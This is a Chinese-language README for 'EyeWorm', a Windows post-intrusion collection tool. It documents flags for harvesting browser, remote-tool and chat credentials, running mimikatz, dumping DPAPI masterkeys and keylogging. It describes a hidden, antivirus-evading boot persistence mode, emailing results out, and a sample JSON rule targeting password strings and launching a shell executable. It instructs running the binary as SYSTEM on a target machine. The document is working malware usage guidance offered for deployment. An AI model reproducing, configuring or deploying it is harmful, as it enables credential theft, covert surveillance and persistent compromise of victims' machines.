一款强大的内网信息收集工具,支持文件、文件夹、文件内容、命令、注册表、进程、mimikatz命令、dpapi、最近访问收集,且支持定制化配置,只需更新配置文件,定义收集规则,即可开启对各类浏览器、remote工具、聊天软件进行凭据、信息收集
-wfiles 根据配置文件对文件、文件夹、内容收集 文件名支持通配符 ,? 例如: a?c、ab 、 *密码
-wcommands 根据配置文件的cmd命令集收集输出信息(結合wfiles,可进行命令结果文件收集)
-wprocess 根据配置文件的进程名,匹配正在运行的进程路径进行信息收集
-wregistry 根据配置文件配置收集注册表项信息
-wrecent 根据配置文件配置收集最近访问中的目标文件
-wmimikatz 根据配置文件配置 使用加密型mimikatz进行结果收集
-dpapi 获得Masterkey
-spy 开启监控,关机后结束
-redeye 开启常驻模式(开机自启),需要配置 回传邮件、打包密码、常驻规则。(该模式已经实现免杀和隐藏,必须用相同配置文件的unred解除)
例如 :Eyeworm -wfiles -wcommands -redEye
开启文件、命令 的常驻收集
-upload 上传收集结果 需要配置 回传邮件、打包密码
-o="result.txt" 把收集结果输出文件
-keylog 键盘记录功能开启(必须开启redeye或spy)
-unred 解除该电脑的redeye常驻模式
下列是单个收集策略: ` {
"RuleName":"DefultFilesWorm", //规则名称 如扩展chromeWorm,QQBrowerWorm 用于区分
"OS": "Windows", //操作系统
"CollectorType": "File", //收集策略类型, 如wfiles 收集的就是类型为File的收集策略
(File 文件收集,Command 命令收集,Recent 最近访问,Process 进程收集,Registry 注册表收集 APi mimikatz收集)
"Category": "defult", // 分类 用于归类如:Browsers、remoteTools,、chatTool
"Locations":["C:/Users/admin/Chrome","E:/QQ"], //搜索路径集
"ContentKeys": ["\"_id\":","password:"], //内容收集的匹配字
"FileName":["*c","a?b","*"], //文件名匹配字
"SuffixTypes":[".txt"], // 搜索文件后缀
"Explain": "文件及文件夹收集,支持 * 通配符 ",
"Commands":["set","ipconfig","start 'E:\shell.exe'"], // 命令收集中需要执行的命令,(收集结果)
"ProcessName": ["QQ.exe","Chrome.exe"], // 进程收集中的进程
"DeCrypt": false, // 保留字 解密功能(todo)
"DeCryptCommand": null //保留字 解密命令 (todo)
},`
进入 PackSource 中,配置好ico,EyeConfig.json,versioninfo.json,main.manifest 四个文件 运行PackSource.go 得到 main.syso 在EyeWorm目录下
回到EyeWorm目录下,go build
由于配置文件是内嵌go中的,防止重复编译麻烦,提供UpdateSource更新内嵌的EyeConfig.json 配置文件
修改好EyeConfig.json
编译UpdateSource中内容,得到更新工具UpdateSource.exe
使用UpdateSource.exe -File=Eyeworm.exe -Data=EyeConfig.json
即可更新
Eyeworm.exe上传在目标机器上执行对应命令
例:Eyeworm.exe -wfile -wcommand -wprocess -wregistry -wrecent -wmimikatz -keylog -redeye
由于继承mimiktaz,以及隐藏,免杀功能 需要使用system权限运行,否则 常驻和mimikatz功能可能失败
本人热爱技术,钻研,欢迎志同道合的兄弟一起研究讨论 邮件:1098516987@qq.com CSDN:https://blog.csdn.net/VB551